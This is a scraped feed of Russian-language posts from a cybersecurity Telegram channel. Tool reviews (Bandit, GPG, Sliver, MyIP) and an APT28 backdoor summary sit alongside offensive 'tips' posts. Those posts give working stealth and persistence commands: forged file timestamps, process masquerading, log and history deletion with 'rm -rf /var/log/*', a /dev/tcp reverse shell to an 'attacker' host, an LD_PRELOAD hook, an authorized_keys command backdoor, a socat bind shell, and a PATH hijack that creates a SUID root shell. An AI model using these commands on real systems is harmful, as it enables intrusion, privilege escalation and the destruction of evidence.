Корреляция без SIEM: универсальный движок в действии
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
⏺ В статье показывают 7 примеров, где такой механизм реально работает: скоринг пользователей в UEBA, макрокорреляции для SOC, прогнозирование рисков в SGRC и даже контроль в АСУ ТП. Один и тот же инструмент, но для разного.
ZeroDay | #Статья
Обычно правила корреляции живут внутри SIEM и помогают ловить инциденты. Но тот же подход можно использовать и в других местах: от промышленности и SOC до процессов SSDLC и SGRC. Получается единый «движок», который связывает разрозненные события и данные, превращая их в понятные выводы.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍2❤🔥1💘1
Bandit: быстрый поиск уязвимостей в Python-коде
👋
⏺ Bandit — классная утилита для поиска уязвимостей в Python-коде.
Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
⏺ Python сегодня, очевидно, один из самых популярных языков, а значит и уязвимости в коде на нём часто становятся точкой входа для атак. Bandit может ловить проблемы ещё на этапе разработки или CI/CD. Утилита легко встраивается в пайплайн (pre-commit hooks, GitHub Actions, GitLab CI и пр.) и формирует отчёты в разных форматах — от JSON до HTML.
⏺ Быстрый старт:
Установка через pip:
Проверка всего проекта:
Или проверка конкретного файла:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.Она берёт ваши .py файлы, строит AST (абстрактное синтаксическое дерево) и прогоняет его через набор плагинов, которые ищут всё странное: от небезопасного использования eval() до кривой работы с криптографией и возможных SQL-инъекций.
Установка через pip:
pip install bandit
Проверка всего проекта:
bandit -r ./my_project
Или проверка конкретного файла:
bandit my_noscript.py
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18❤4❤🔥4
This media is not supported in your browser
VIEW IN TELEGRAM
5 фишек Bash для скрытности
👋
⏺ Подделка времени файлов: Чтобы файл не выделялся среди новых, можно «состарить» его:
Так скрипт выглядит как старый системный.
⏺ Маскировка процессов: В ps любой увидит ваш процесс. Но можно «притвориться»:
Теперь скрипт похож на системный или веб-сервер.
⏺ Работа без истории: Чтобы команды не остались в ~/.bash_history:
⏺ Алиасы для скрытности: Подменяем стандартные команды:
Первое прячет файлы, второе - убирает следы.
⏺ Скрытый сетевой трафик: Обратный шелл можно завуалировать под HTTPS:
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Приветствую в мире цифровой безопасности!
Давай расскажу о 5 фишках Bash для того, чтобы работать тише.touch -r /bin/ls hack.sh
touch -t 201801010101.01 hack.sh
Так скрипт выглядит как старый системный.
exec -a "[kworker/0:1H]" ./evil.sh
echo "httpd" > /proc/$$/comm
Теперь скрипт похож на системный или веб-сервер.
HISTFILE=/dev/null
set +o history
history -c && history -w
alias ls='ls --hide=hack.sh'
alias vanish='rm -rf ~/.bash_history /var/log/*'
Первое прячет файлы, второе - убирает следы.
bash -i >& /dev/tcp/attacker/443 0>&1
Трафик пойдёт через порт 443, что выглядит в принципе привычно.
ZeroDay | #bash
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22❤9😱2😁1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ LD_PRELOAD для подмены системных вызовов: Если у вас есть возможность писать в /tmp, можно внедрить свою библиотеку. Например, перехватить вызов open() и переправить его в свой файл. Создаём evil.c:
➡️ Собираем:
➡️ Запускаем:
⏺ SSH-ключи без пароля: Многие забывают, что authorized_keys поддерживает опции. Можно добавить туда ключ с хитрым префиксом:
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
⏺ Socat как универсальный биндер: Иногда на цели нет nc, а нужен обратный шелл или проброс. Socat поможет тут:
Или проброс порта с шифрованием:
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.#include <stdio.h>
#include <dlfcn.h>
#include <fcntl.h>
int open(const char *path, int flags, ...) {
static int (*orig_open)(const char*, int, ...) = NULL;
if (!orig_open) orig_open = dlsym(RTLD_NEXT, "open");
if (strstr(path, "shadow")) return orig_open("/etc/passwd", flags);
return orig_open(path, flags);
}
gcc -fPIC -shared -o evil.so evil.c -ldlLD_PRELOAD=./evil.so target_binarycommand="/bin/bash -i" ssh-rsa AAAAB3...
Теперь при подключении запускается ваш шелл, а админ видит «обычный ключ».
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
Или проброс порта с шифрованием:
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:22
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤7
Какой метод чаще всего юзают хакеры для обхода сигнатурного IDS?
Anonymous Quiz
13%
Использование нестандартных портов
57%
Фрагментация пакетов и изменение порядка TCP-сегментов
19%
Маскировка IP через прокси
12%
Смена User-Agent
❤14❤🔥3😁3
Новая атака группы APT28 на компании в странах НАТО
👋
⏺ NotDoor - что это: VBA-бэкдор для Outlook, который следит за входящей почтой и ждёт «триггерного» письма. Как только оно приходит, хакеры могут забирать файлы, слать данные и выполнять команды на вашей машине. Название связано с тем, что в коде часто встречается слово “Nothing”.
⏺ Как он попадает в систему: через OneDrive с хитрой техникой DLL side-loading. Запускается DLL (SSPICLI.dll) и сразу отключает защиту макросов. Дальше PowerShell-команды шифруют данные, создают устойчивость через реестр и делают всё максимально незаметно.
⏺ Что делает внутри: VBA слушает события Outlook (MAPILogonComplete и NewMailEx), создаёт папку %TEMP%\Temp для временных файлов и отсылает их на Proton Mail. Письма с триггером, например «Daily Report», заставляют выполнять встроенные команды.
⏺ Какие команды умеет: cmd - выполнить команду и прислать результат, cmdno - выполнить тихо, dwn - украсть файлы, upl - загрузить файлы на машину жертвы.
⏺ Скрытность и фишки: хакеры используют Microsoft Dev Tunnels и Telegram для скрытой связи с C2, ротацию доменов через Cloudflare Workers, маскируют трафик под обычные сервисы - почти полностью «невидимы».
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!Сегодня разберём кампанию российской группировки APT28, нацеленную на компании в странах НАТО.ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤10👎5🤔2🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
1😁56🤮16🤣12❤6💋3
Свой мессенджер вместо MAX: Matrix и XMPP на домашнем сервере
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
⏺ В статье рассказывается, как на своём сервере автор развернул два конкурирующих протокола - Matrix (Synapse) и XMPP (Ejabberd) - и сравнил их на практике. Пошагово показано разворачивание в Docker с Portainer, объясняется, зачем нужен Coturn для звонков, и какие клиенты удобнее в реальной жизни (спойлер: родители тоже тестировали).
ZeroDay | #Статья
В какой-то момент автор статьи понял, что звонить по мобильной сети в 2025 году - это уже моветон: качество хуже, чем в VoIP, а про безопасность и говорить нечего. Популярные мессенджеры вроде Telegram и WhatsApp тоже не вариант: либо риски утечки, либо странные ограничения. А вот MAX у него вообще отказался запускаться - и ладно.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥24😁13❤4🤡2👍1👎1💘1
ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍8❤🔥3😁1
Киберустойчивость: как бизнес выживает во время атак
👋 Приветствую в мире цифровой безопасности!
— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»
⏺ Такие вопросы сегодня звучат постоянно. Простое «у нас есть защита» уже не успокаивает - бизнесу важно видеть реальную готовность компании выстоять под атаками. Тут на первый план выходит киберустойчивость - умение продолжать работу даже в случае атаки или сбоя.
⏺ От CISO ждут не стопки отчётов, а прямого ответа: где настоящие риски и как они бьют по бизнесу.
⏺ В Innostage, где, помогают бизнесам строить киберустойчивость, подход строится на трёх принципах:
1️⃣ Измеримость — от «недопустимых событий» до Индекса защищённости.
2️⃣ Управляемость — понятная логика решений, а не хаос.
3️⃣ Финансовая привязка — разговор на языке бизнес-рисков и затрат.
⏺ В итоге киберустойчивость уже не дело одного ИБ, а часть стратегии: помогает контролить риски, принимать решения и показывать клиентам и партнёрам, что компании вполне можно доверять.
📅 Об этом будут говорить профи и эксперты на Kazan Digital Week 17–19 сентября.
ZeroDay | #cybersecurity
— «Вы точно выдержите кибератаку?»
— «А если система ляжет, что будет с нашими данными?»
ZeroDay | #cybersecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8❤4👍2👨💻2❤🔥1👎1🔥1
Sliver — кроссплатформенный фреймворк для Red Team
👋
⏺ Что это: кроссплатформенный фреймворк для эмуляции атак. Работает на Windows, Mac и Linux, а его импланты подстраиваются под вашу цель.
⏺ А вот что умеет: он генерирует код за секунды, прячет его при компиляции, работает с staged и stageless payloads. Также тут безопасная связь с сервером через mTLS, WireGuard, HTTP(S) и DNS. Можно скриптить на Python или JS/TS, мигрировать процессы, делать инъекции, манипулировать токенами, разворачивать TCP и named pipe pivot, запускать .NET сборки прямо в памяти… и это только часть.
⏺ Зачем нужен: чекнуть, где ваша защита слабая, потренировать команду реагирования и посмотреть, как настоящие Red Team обходят системы, не ломая ничего критичного.
⏺ Быстро стартуем:
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/BishopFox/sliver.git
cd sliver
make
./sliver-server
./sliver-client
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18💘2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Все тонкости GPG-подписей
👋
⏺ Что это: GPG-подпись - это способ доказать, что файл или сообщение действительно отправил тот, кто его подписал, и что его не подменили по пути. По сути, это как цифровая подпись на бумажном документе, только для файлов и писем. Даже если кто-то перехватит файл, подделать подпись без приватного ключа невозможно.
⏺ Подпись файлов:
1️⃣ Создаём ключ:
Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».
2️⃣ Подписываем файл:
Файл msg.gpg теперь содержит ваше сообщение + подпись.
3️⃣ Красивый ASCII-формат:
Или вариант для людей — clear-sign, где сообщение остаётся читаемым:
⏺ Detached signatures: подпись в отдельном файле, если не хотите смешивать её с сообщением:
Проверяем так:
Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.
⏺ Проверка чужих подписей:
GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.
ZeroDay | #GPG
Приветствую в мире цифровой безопасности!Сегодня разберём, что такое GPG-подписи и зачем они нужны вообще.gpg --full-gen-key
Выбираем RSA 4096, срок действия, имя и почту. GPG попросит немного случайных действий (печать, движения мышкой), чтобы ключ был «живым».
gpg --sign -u your_email@example.com msg
Файл msg.gpg теперь содержит ваше сообщение + подпись.
gpg --armor --sign -u your_email@example.com msg
Или вариант для людей — clear-sign, где сообщение остаётся читаемым:
gpg --clear-sign -u your_email@example.com msg
gpg --detach-sign -u your_email@example.com msg
gpg --armor --detach-sign -u your_email@example.com msg
Проверяем так:
gpg --verify msg.asc
gpg --verify msg.asc msg
Если кто-то изменит хотя бы один символ, GPG сразу скажет, что подпись плохая.
gpg --import key.pub
gpg --verify msg.asc
GPG проверит подпись, но предупредит, если ключ не доверенный. Подпись будет валидной, но доверять ей - решать вам.
ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤1
Какой метод используют продвинутые вредоносы для скрытой автозагрузки без записи в автозагрузку Windows?
Anonymous Quiz
28%
Планировщик заданий
35%
Изменение реестра HKCU\Run
8%
Создание ярлыка в папке Startup
28%
Установка службы через sc.exe
👍6🔥2😁2
This media is not supported in your browser
VIEW IN TELEGRAM
GPG: подписи и доверие к ключам
Часть 2
👋
⏺ Слепо доверять нельзя: Представим: Боб отправляет Алисе свой ключ, но посередине сидит Ева. Она может подделать ключ и «заменить» его на свой. Когда Боб пришлёт сообщение, Ева сможет подписать его своим ключом, и Алиса ничего не заметит. Так что просто скачать чужой ключ и довериться ему - ну так себе идея.
⏺ Web of Trust - сеть доверия: Вместо централизованных сертификатов (как в HTTPS) GPG использует Web of Trust. Смысл прост: ты доверяешь подписям людей, которым доверяешь сам.
Уровни доверия к подписям:
➡️ Не знаю или не буду отвечать
➡️ Не доверяю
➡️ Доверяю ограниченно (для полноценного доверия нужно несколько таких подписей)
➡️ Полностью доверяю (одной подписи достаточно)
➡️ Абсолютно доверяю (только для твоего ключа)
⏺ Пример на практике: У Алисы и Боба есть ключи друзей, и они могут проверить ключи друг друга через общих знакомых, подписать чужие ключи и обменяться подписанными ключами. Теперь никакая Ева им не страшна: подделка одной подписи не даст ей обмануть сеть.
⏺ Подписываем чужой ключ
После этого проверка подписи файла покажет доверие:
Если всё сделано правильно - подпись валидна и доверие подтверждено.
⏺ Проверка реального файла
ZeroDay | #GPG
Часть 2
Приветствую в мире цифровой безопасности!В прошлый раз мы говорили о GPG-подписях для файлов. В этот раз обсудим, как работает доверие к ключам.Уровни доверия к подписям:
gpg --edit-key user@example.com
gpg> sign -u Alice
gpg> save
После этого проверка подписи файла покажет доверие:
gpg --verify msg.asc
Если всё сделано правильно - подпись валидна и доверие подтверждено.
wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64
wget https://github.com/szaffarano/wofi-power-menu/releases/download/v0.3.1/wofi-power-menu-linux-x64.asc
gpg --recv-keys 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg -u David --lsign-key 42BE68F43D528467FC281E2E310FFE86A2E427BA
gpg --verify wofi-power-menu-linux-x64.asc
ZeroDay | #GPG
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Приветствую в мире цифровой безопасности!
Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.
ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14✍3👍1
Deep-dive, или когда обновиться недостаточно
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
⏺ В статье будет краткий чек-лист Deep-dive: верификация SCA, поиск первоисточников, оценка эксплуатируемости и практические обходы (конфиги, мониторинг, тестовая эксплуатация). Кейсы на Spring/Struts и Python показывают, как решать прям на практике.
ZeroDay | #Статья
Обновление библиотеки - первое, что советует SCA-отчёт. Но что делать, если патча нет, обновление ломает совместимость или уязвимость - мнимая? В таких случаях можно уже нужно копать глубже: читать CVE, смотреть код, проверять, реально ли приложение вызывает уязвимый путь, и думать про обходные меры.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤1🏆1
MyIP: универсальный чекер IP и сетевых связей
👋
⏺ MyIP - универсальный «чекер» всего, что связано с твоим IP: геолокация, DNS- и WebRTC-утечки, доступность сайтов, speed test, MTR и whois. Короче все в одном месте, без беготни по десятку сервисов.
⏺ Можно быстро проверить пинг до серверов по миру, доступность популярных сайтов и получить полную инфу по любому IPшнику.
⏺ Смотрим локально:
Или одной командой через Docker:
⏺ И финально, что еще есть классного: PWA, мобильный режим, тёмная тема, хоткеи и встроенный чек-лист по кибербезу даже 😎
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/jason5ng32/MyIP.git
cd MyIP
npm install && npm run build
npm start
Или одной командой через Docker:
docker run -d -p 18966:18966 --name myip jason5ng32/myip:latest
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12🤡5👍3❤🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
DLP vs CASB: что выбрать?
👋
⏺ DLP (Data Loss Prevention) - это как внутренний «охранник» компании. Следит, чтобы важные данные не улетели наружу: почта, флешки, копирование файлов. Помогает предотвратить случайные утечки или намеренные кражи инфы внутри компании. Главное, что DLP отлично работает внутри корпоративной сети, но с облачными сервисами и SaaS ограничений больше.
⏺ CASB (Cloud Access Security Broker) — такой «страж» облака. Контролирует доступ к SaaS, проверяет трафик, шифрует данные, ловит подозрительные действия и блокирует непонятные подключения. Он ориентирован на облачные сервисы, поэтому локальные файлы и устройства под его зоной действия не всегда.
ZeroDay | #CASB #DLP
Приветствую в мире цифровой безопасности!Разберем, что выбрать для защиты от утечек данных — DLP или CASB.ZeroDay | #CASB #DLP
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7❤🔥3👌2👍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Linux capabilities вместо SUID: SUID-бинарники - это старый трюк, но современные админы иногда забывают про capabilities.
➡️ Видите cap_net_admin или cap_setuid+ep? Вот теперь можно изучить бинарь и поднять права. Защита проста: убрать лишние capabilities и мониторить их появление.
⏺ PATH-hijack через cron или systemd: Если сервис запускает команды без полного пути — подкиньте свой бинар в каталог, который стоит раньше в PATH:
➡️ Защита: жёсткий PATH и абсолютные пути в unit-файлах и crontab, запрет на запись в системные каталоги.
⏺ SSH-agent forwarding & ProxyCommand для тихого pivot: Агент на цели может быть вашим тайным оружием: ключи остаются у вас, а доступ дальше можно получить через ProxyCommand/ProxyJump.
➡️ Защита: отключать агент-форвардинг (AllowAgentForwarding no) и следить за нестандартным SSH-трафиком.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.getcap -r / 2>/dev/null
echo -e '#!/bin/bash\ncp /bin/sh /tmp/rootsh && chmod +s /tmp/rootsh' > /tmp/backup
chmod +x /tmp/backup
export PATH=/tmp:$PATH
ssh-add -L # покажет ключи агента
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤5❤🔥1